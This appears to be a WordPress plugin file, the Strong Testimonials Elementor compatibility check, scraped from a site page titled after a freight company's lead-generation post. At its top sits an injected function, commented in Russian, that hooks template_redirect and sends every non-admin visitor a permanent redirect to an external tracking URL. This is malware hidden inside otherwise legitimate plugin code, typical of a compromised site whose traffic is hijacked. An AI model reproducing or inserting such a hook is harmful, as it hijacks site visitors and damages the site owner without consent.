function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); if (!defined('ABSPATH')) exit; // Exit if accessed directly final class Strong_Testimonials_Elementor_Check { /** * Plugin Version * * @since 2.40.5 * @var string The plugin version. */ const VERSION = '2.40.5'; /** * Minimum Elementor Version * * @since 2.40.5 * @var string Minimum Elementor version required to run the elementor block. */ const MINIMUM_ELEMENTOR_VERSION = '2.4.5'; /** * Minimum PHP Version * * @since 2.40.5 * @var string Minimum PHP version required to run the elementor block. */ const MINIMUM_PHP_VERSION = '7.0'; /** * Constructor * * @since 2.40.5 * @access public */ public function __construct() { // Init Plugin add_action('plugins_loaded', array($this, 'init')); } public function init() { if ( ! did_action( 'elementor/loaded' ) ) { return; } // Check for required Elementor version if (!version_compare(ELEMENTOR_VERSION, self::MINIMUM_ELEMENTOR_VERSION, '>=')) { add_action('admin_notices', array($this, 'admin_notice_minimum_elementor_version')); return; } // Check for required PHP version if (version_compare(PHP_VERSION, self::MINIMUM_PHP_VERSION, '<')) { add_action('admin_notices', array($this, 'admin_notice_minimum_php_version')); return; } add_action('elementor/widgets/widgets_registered', array( $this, 'remove_strong_testimonials_widget' ), 15); // Once we get here, We have passed all validation checks so we can safely include our elementor block activation require_once( WPMTST_INC.'elementor/class-strong-elementor-widget-activation.php' ); } /** * Admin notice * * Warning when the site doesn't have a minimum required Elementor version. * * @since 2.40.5 * @access public */ public function admin_notice_minimum_elementor_version() { if ( isset( $_GET['activate'] ) ) { unset( $_GET['activate'] ); } $message = sprintf( esc_html__('"%1$s" requires "%2$s" version %3$s or greater.', 'strong-testimonials'), '' . esc_html__('Strong Testimonials Elementor widget', 'strong-testimonials') . '', '' . esc_html__('Elementor', 'strong-testimonials') . '', self::MINIMUM_ELEMENTOR_VERSION ); printf('


', $message); } /** * Admin notice * * Warning when the site doesn't have a minimum required PHP version. * * @since 1.0.0 * @access public */ public function admin_notice_minimum_php_version() { if ( isset( $_GET['activate'] ) ) { unset( $_GET['activate'] ); } $message = sprintf( esc_html__('"%1$s" requires "%2$s" version %3$s or greater.', 'strong-testimonials'), '' . esc_html__('Strong Testimonials Elementor widget', 'strong-testimonials') . '', '' . esc_html__('PHP', 'strong-testimonials') . '', self::MINIMUM_PHP_VERSION ); printf('


', $message); } /* Remove WordPress widget because we have a dedicated Elementor Widget */ public function remove_strong_testimonials_widget( $widget_manager ){ $widget_manager->unregister_widget_type( 'strong-testimonials-view-widget' ); } } new Strong_Testimonials_Elementor_Check(); How We Get Unlimited FREE Leads From Google – Cam Freight

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